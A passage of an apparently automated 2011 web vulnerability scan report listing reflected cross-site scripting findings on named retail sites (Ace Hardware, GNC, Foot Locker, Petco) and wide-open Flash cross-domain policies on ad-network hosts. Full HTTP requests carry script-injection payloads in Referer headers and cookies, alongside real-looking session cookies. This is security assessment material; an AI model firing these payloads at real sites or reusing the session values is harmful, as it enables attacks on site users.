...[SNIP]...

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cbd"><script>alert(1)</script>8eeef5c5ccb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:10 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:17 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=lawng319;u1=;u2=2;u3=;u4=2568444;u5=http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb;ord=1;num=96780812?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>2efdd8e8816 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}
Referer: http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816;ord=1;num=81155747?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd5a"><script>alert(1)</script>3de0fcd614 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217
Referer: http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:42 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114272


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614;u6=;u7=;ord=1;num=38799404?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the TID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d25d0"><script>alert(1)</script>eb65c43451a was submitted in the TID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0d25d0"><script>alert(1)</script>eb65c43451a

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:58:54 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:58:54 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0d25d0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeb65c43451a;expires=Sun, 14-Aug-2011 10:58:54 GMT;path=/
Content-Length: 3661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form name="gotoRegistration" id="frmGotoRegistration" action="https://www.footlocker.com/account/default.cfm?TID=5555-37151120432137200525561-0d25d0"><script>alert(1)</script>eb65c43451a&action=accountCreate" METHOD="POST" TARGET="_parent">
...[SNIP]...

5.76. http://www.petco.com/ [ResonanceSegment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.petco.com
Path:   /

Issue detail

The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 61c9e(a)c8b8ba6952f was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=261c9e(a)c8b8ba6952f; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:57:37 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:57:37 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:57:37 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:57:37 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:57:37 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<script type='text/javascript'>var certonaSegment = 261c9e(a)c8b8ba6952f;var resx = new Object();resx.appid='petco01';resx.top1=33333;resx.top2=66666;resx.top3=100000;resx.lkmatch=/product\/\d+|sku%3D\d+/i;resx.rrelem='home_rr';resx.customerid='256672559073194';</script>
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 87 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://9d060c.r.axf8.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://9d060c.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 9d060c.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://a.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.rfihub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.5. http://action.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=b8c3cf57-3d33-43ae-957f-69f246813443; path=/; expires=Thu, 15-May-2014 01:55:06 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 16 May 2011 01:55:06 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.6. http://action.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 16 May 2011 01:55:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.7. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:33 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.8. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://ads.traderonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.traderonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:18 GMT
ETag: "c6acd-d0-46e5f933c6580"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.10. http://ads.undertone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

